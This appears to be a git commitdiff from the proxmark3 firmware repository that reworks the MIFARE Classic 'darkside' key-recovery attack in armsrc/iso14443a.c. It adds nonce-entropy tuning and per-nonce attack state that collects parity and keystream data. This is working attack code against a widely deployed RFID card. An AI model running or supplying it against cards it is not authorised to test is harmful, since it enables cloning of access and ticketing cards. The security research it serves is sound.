]> git.zerfleddert.de Git - proxmark3-svn/commitdiff
Major changes to 'hf mf mifare', see discussion here : http://www.proxmark.org/forum...
authormartin.holst@gmail.com <martin.holst@gmail.com@ef4ab9da-24cd-11de-8aaa-f3a34680c41f>
Sat, 15 Jun 2013 10:21:39 +0000 (10:21 +0000)
committermartin.holst@gmail.com <martin.holst@gmail.com@ef4ab9da-24cd-11de-8aaa-f3a34680c41f>
Sat, 15 Jun 2013 10:21:39 +0000 (10:21 +0000)
armsrc/iso14443a.c

index bbe748b06b718b3cc977792d79ef9a7e9cfc31a5..0a5512b48ea6bd46c1642ec04f0c8630c00cb389 100644 (file)
@@ -1811,18 +1811,220 @@ void ReaderIso14443a(UsbCommand * c)
        LEDsoff();
 }
 
+#define TEST_LENGTH 100
+typedef struct mftest{
+    uint8_t nt[8];
+    uint8_t count;
+}mftest ;
+
+/**
+ *@brief Tunes the mifare attack settings. This method checks the nonce entropy when
+ *using a specified timeout.
+ *Different cards behave differently, some cards require up to a second to power down (and thus reset
+ *token generator), other cards are fine with 50 ms.
+ *
+ * @param time
+ * @return the entropy. A value of 100 (%) means that every nonce was unique, while a value close to
+ *zero indicates a low entropy: the given timeout is sufficient to power down the card.
+ */
+int TuneMifare(int time)
+{
+    // Mifare AUTH
+    uint8_t mf_auth[]    = { 0x60,0x00,0xf5,0x7b };
+    //uint8_t mf_nr_ar[]   = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
+    uint8_t* receivedAnswer = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET);      // was 3560 - tied to other size changes
+
+    iso14443a_setup();
+    int TIME1=time;
+    int TIME2=2000;
+    uint8_t uid[8];
+    uint32_t cuid;
+    byte_t nt[4];
+    Dbprintf("Tuning... testing a delay of %d ms",time);
+
+
+    mftest nt_values[TEST_LENGTH];
+    int nt_size = 0;
+    int i = 0;
+    for(i = 0 ; i< 100 ; i++)
+    {
+        LED_C_OFF();
+        FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+        SpinDelay(TIME1);
+        FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
+        LED_C_ON();
+        SpinDelayUs(TIME2);
+        if(!iso14443a_select_card(uid, NULL, &cuid)) continue;
+
+        // Transmit MIFARE_CLASSIC_AUTH
+        ReaderTransmit(mf_auth, sizeof(mf_auth));
+
+        // Receive the (16 bit) "random" nonce
+        if (!ReaderReceive(receivedAnswer)) continue;
+        memcpy(nt, receivedAnswer, 4);
+
+        //store it
+        int already_stored = 0;
+        for(int i =  0 ; i < nt_size && !already_stored; i++)
+        {
+            if( memcmp(nt, nt_values[i].nt, 4) == 0)
+            {
+                nt_values[i].count++;
+                already_stored = 1;
+            }
+        }
+        if(!already_stored)
+        {
+            mftest* ptr= &nt_values[nt_size++];
+            //Clear it before use
+            memset(ptr, 0, sizeof(mftest));
+            memcpy(ptr->nt, nt, 4);
+            ptr->count = 1;
+        }
+
+        if(BUTTON_PRESS())
+        {
+            Dbprintf("Tuning aborted prematurely");
+            break;
+        }
+    }
+    /*
+    for(int i = 0 ; i < nt_size;i++){
+        mftest x = nt_values[i];
+        Dbprintf("%d,%d,%d,%d   : %d",x.nt[0],x.nt[1],x.nt[2],x.nt[3],x.count);
+    }
+    */
+    int result = nt_size *100 / i;
+    Dbprintf("      ... results for %d ms : %d %",time, result);
+    return result;
+}
+
 //-----------------------------------------------------------------------------
 // Read an ISO 14443a tag. Send out commands and store answers.
 //
 //-----------------------------------------------------------------------------
+#define STATE_SIZE 100
+typedef struct AttackState{
+    byte_t nt[4];
+    //byte_t nt_attacked[4];
+    byte_t par_list[8];
+    byte_t ks_list[8];
+    byte_t par;
+    byte_t par_low;
+    byte_t nt_diff;
+    uint8_t mf_nr_ar[8];
+} AttackState;
+
+
+int continueAttack(AttackState* pState,uint8_t* receivedAnswer)
+{
+
+    // Transmit reader nonce and reader answer
+    ReaderTransmitPar(pState->mf_nr_ar, sizeof(pState->mf_nr_ar),pState->par);
+
+    // Receive 4 bit answer
+    int len = ReaderReceive(receivedAnswer);
+    if (!len)
+    {
+        if (pState->nt_diff == 0)
+        {
+            pState->par++;
+        } else {
+            pState->par = (((pState->par >> 3) + 1) << 3) | pState->par_low;
+        }
+        return 2;
+    }
+    if(pState->nt_diff == 0)
+    {
+        pState->par_low = pState->par & 0x07;
+    }
+    //Dbprintf("answer received, parameter (%d), (memcmp(nt, nt_no)=%d",parameter,memcmp(nt, nt_noattack, 4));
+    //if ( (parameter != 0) && (memcmp(nt, nt_noattack, 4) == 0) ) continue;
+    //isNULL =  0;//|| !(nt_attacked[0] == 0) && (nt_attacked[1] == 0) && (nt_attacked[2] == 0) && (nt_attacked[3] == 0);
+     //
+      //  if ( /*(isNULL != 0 ) && */(memcmp(nt, nt_attacked, 4) != 0) ) continue;
+
+    //led_on = !led_on;
+    //if(led_on) LED_B_ON(); else LED_B_OFF();
+    pState->par_list[pState->nt_diff] = pState->par;
+    pState->ks_list[pState->nt_diff] = receivedAnswer[0] ^ 0x05;
+
+    // Test if the information is complete
+    if (pState->nt_diff == 0x07) {
+        return 0;
+    }
+
+    pState->nt_diff = (pState->nt_diff + 1) & 0x07;
+    pState->mf_nr_ar[3] = pState->nt_diff << 5;
+    pState->par = pState->par_low;
+    return 1;
+}
+
+void reportResults(uint8_t uid[8],AttackState *pState, int isOK)
+{
+    LogTrace(pState->nt, 4, 0, GetParity(pState->nt, 4), TRUE);
+    LogTrace(pState->par_list, 8, 0, GetParity(pState->par_list, 8), TRUE);
+    LogTrace(pState->ks_list, 8, 0, GetParity(pState->ks_list, 8), TRUE);
+
+    byte_t buf[48];
+    memcpy(buf + 0,  uid, 4);
+    if(pState != NULL)
+    {
+        memcpy(buf + 4,  pState->nt, 4);
+        memcpy(buf + 8,  pState->par_list, 8);
+        memcpy(buf + 16, pState->ks_list, 8);
+    }
+
+    LED_B_ON();
+    cmd_send(CMD_ACK,isOK,0,0,buf,48);
+    LED_B_OFF();
+
+    // Thats it...
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+    LEDsoff();
+    tracing = TRUE;
+
+    if (MF_DBGLEVEL >= 1)      DbpString("COMMAND mifare FINISHED");
+}
+
+
+
+
 void ReaderMifare(uint32_t parameter)
 {
+    /**
+     *First, we tune it.
+     **/
+    int entropy = 100;
+    int time = 25;
+    entropy = TuneMifare(time);
+
+    while(entropy > 50 && time < 2000){
+        //Increase timeout, but never more than 500ms at a time
+        time = MIN(time*2, time+500);
+        entropy = TuneMifare(time);
+    }
+
+    if(entropy > 50){
+        Dbprintf("OBS! This card has high entropy (%d) and slow power-down. This may take a while", entropy);
+    }
+    Dbprintf("Using power-down-time of %d ms, entropy %d", time, entropy);
+
+    /**
+     *Allocate our state-table and initialize with zeroes
+     **/
+
+
+    AttackState states[STATE_SIZE] ;
+
+
+    Dbprintf("Memory allocated ok! (%d bytes)",STATE_SIZE*sizeof(AttackState) );
+    memset(states, 0, STATE_SIZE*sizeof(AttackState));
        // Mifare AUTH
        uint8_t mf_auth[]    = { 0x60,0x00,0xf5,0x7b };
-       uint8_t mf_nr_ar[]   = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
-
        uint8_t* receivedAnswer = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET);   // was 3560 - tied to other size changes
-       traceLen = 0;
+
+    traceLen = 0;
        tracing = false;
 
        iso14443a_setup();
@@ -1831,37 +2033,26 @@ void ReaderMifare(uint32_t parameter)
        LED_B_OFF();
        LED_C_OFF();
 
-       byte_t nt_diff = 0;
        LED_A_OFF();
-       byte_t par = 0;
-       //byte_t par_mask = 0xff;
-       byte_t par_low = 0;
-       int led_on = TRUE;
        uint8_t uid[8];
        uint32_t cuid;
 
-       tracing = FALSE;
-       byte_t nt[4] = {0,0,0,0};
-       byte_t nt_attacked[4], nt_noattack[4];
-       byte_t par_list[8] = {0,0,0,0,0,0,0,0};
-       byte_t ks_list[8] = {0,0,0,0,0,0,0,0};
-       num_to_bytes(parameter, 4, nt_noattack);
-       int isOK = 0, isNULL = 0;
-
-       while(TRUE)
+    byte_t nt_noattack[4];
+    num_to_bytes(parameter, 4, nt_noattack);
+    byte_t nt[4];
+    int nts_attacked= 0;
+    //Keeps track of progress (max value of nt_diff for our states)
+    int progress = 0;
+    int high_entropy_warning_issued = 0;
+    while(!BUTTON_PRESS())
        {
                LED_C_OFF();
                FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
-               SpinDelay(50);
+        SpinDelay(time);
                FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
                LED_C_ON();
                SpinDelay(2);
 
-               // Test if the action was cancelled
-               if(BUTTON_PRESS()) {
-                       break;
-               }
-
                if(!iso14443a_select_card(uid, NULL, &cuid)) continue;
 
                // Transmit MIFARE_CLASSIC_AUTH
@@ -1869,76 +2060,80 @@ void ReaderMifare(uint32_t parameter)
 
                // Receive the (16 bit) "random" nonce
                if (!ReaderReceive(receivedAnswer)) continue;
-               memcpy(nt, receivedAnswer, 4);
-
-               // Transmit reader nonce and reader answer
-               ReaderTransmitPar(mf_nr_ar, sizeof(mf_nr_ar),par);
-
-               // Receive 4 bit answer
-               if (ReaderReceive(receivedAnswer))
-               {
-                       if ( (parameter != 0) && (memcmp(nt, nt_noattack, 4) == 0) ) continue;
-
-                       isNULL = !(nt_attacked[0] == 0) && (nt_attacked[1] == 0) && (nt_attacked[2] == 0) && (nt_attacked[3] == 0);
-                       if ( (isNULL != 0 ) && (memcmp(nt, nt_attacked, 4) != 0) ) continue;
-
-                       if (nt_diff == 0)
-                       {
-                               LED_A_ON();
-                               memcpy(nt_attacked, nt, 4);
-                               //par_mask = 0xf8;
-                               par_low = par & 0x07;
-                       }
+        memcpy(nt, receivedAnswer, 4);
+
+        //Now we have the NT. Check if this NT is already under attack
+        AttackState* pState = NULL;
+        int i = 0;
+        for(i = 0 ; i < nts_attacked && pState == NULL; i++)
+        {
+            if( memcmp(nt, states[i].nt, 4) == 0)
+            {
+                //we have it
+                pState = &states[i];
+                //Dbprintf("Existing state found (%d)", i);
+            }
+        }
 
-                       led_on = !led_on;
-                       if(led_on) LED_B_ON(); else LED_B_OFF();
-                       par_list[nt_diff] = par;
-                       ks_list[nt_diff] = receivedAnswer[0] ^ 0x05;
+        if(pState == NULL){
+            if(nts_attacked < STATE_SIZE )
+            {
+                //Initialize  a new state
+                pState = &states[nts_attacked++];
+                //Clear it before use
+                memset(pState, 0, sizeof(AttackState));
+                memcpy(pState->nt, nt, 4);
+                i = nts_attacked;
+                //Dbprintf("New state created, nt=");
+            }else if(!high_entropy_warning_issued){
+                /**
+                 *If we wound up here, it means that the state table was eaten up by potential nonces. This could be fixed by
+                 *increasing the size of the state buffer, however, it points to some other problem. Ideally, we should get the same nonce
+                 *every time. Realistically we should get a few different nonces, but if we get more than 50, there is probably somehting
+                 *else that is wrong. An attack using too high nonce entropy will take **LONG** time to finish.
+                 */
+                DbpString("WARNING: Nonce entropy is suspiciously high, something is wrong. Check timeouts (and perhaps increase STATE_SIZE)");
+                high_entropy_warning_issued = 1;
+            }
+        }
 
-                       // Test if the information is complete
-                       if (nt_diff == 0x07) {
-                               isOK = 1;
-                               break;
-                       }
 
-                       nt_diff = (nt_diff + 1) & 0x07;
-                       mf_nr_ar[3] = nt_diff << 5;
-                       par = par_low;
-               } else {
-                       if (nt_diff == 0)
-                       {
-                               par++;
-                       } else {
-                               par = (((par >> 3) + 1) << 3) | par_low;
-                       }
-               }
-       }
 
-       LogTrace(nt, 4, 0, GetParity(nt, 4), TRUE);
-       LogTrace(par_list, 8, 0, GetParity(par_list, 8), TRUE);
-       LogTrace(ks_list, 8, 0, GetParity(ks_list, 8), TRUE);
+        if(pState == NULL) continue;
 
-  byte_t buf[48];
-//     UsbCommand ack = {CMD_ACK, {isOK, 0, 0}};
-       memcpy(buf + 0,  uid, 4);
-       memcpy(buf + 4,  nt, 4);
-       memcpy(buf + 8,  par_list, 8);
-       memcpy(buf + 16, ks_list, 8);
-               
-       LED_B_ON();
-  cmd_send(CMD_ACK,isOK,0,0,buf,48);
-//     UsbSendPacket((uint8_t *)&ack, sizeof(UsbCommand));
-       LED_B_OFF();    
+        int result = continueAttack(pState, receivedAnswer);
 
-       // Thats it...
-       FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
-       LEDsoff();
-       tracing = TRUE;
-       
-       if (MF_DBGLEVEL >= 1)   DbpString("COMMAND mifare FINISHED");
+        if(result == 1){
+            //One state progressed another step
+            if(pState->nt_diff >  progress)
+            {
+                progress = pState->nt_diff;
+                //Alert the user
+                Dbprintf("Recovery progress: %d/8, NTs attacked: %d ", progress,nts_attacked );
+            }
+            //Dbprintf("State increased to %d in state %d", pState->nt_diff, i);
+        }
+        else if(result == 2){
+            //Dbprintf("Continue attack no answer, par is now %d", pState->par);
+        }
+        else if(result == 0){
+            //uint64_t par_list = bytes_to_num((uint8_t*)&pState->par_list, 8);
+            //uint64_t ks_list = bytes_to_num((uint8_t*)&pState->ks_list, 8);
+            //uint32_t xnt = bytes_to_num((uint8_t*)&pState->nt,4 );
+            //uint32_t xuid = (uint32_t)bytes_to_num((uint8_t*)&uid, 4);
+            //Dbprintf("\n#nuid(%08x) nt(%08x) par(%016x) ks(%016x)",xuid,xnt,par_list,ks_list);
+            //Dbprintf("\n./nonce2key %08x %08x %016x %016x\n",xuid,xnt,par_list,ks_list);
+            //Dbprintf("Finished");
+            reportResults(uid,pState,1);
+            return;
+            //memset(pState, 0, sizeof(AttackState));
+            //memcpy(pState->nt, nt, 4);
+            //Dbprintf("State reset for state %d!", i);
+            //return;
+        }
+    }
+    reportResults(uid,NULL,0);
 }
-
-
 //-----------------------------------------------------------------------------
 // MIFARE 1K simulate. 
 // 
Impressum, Datenschutz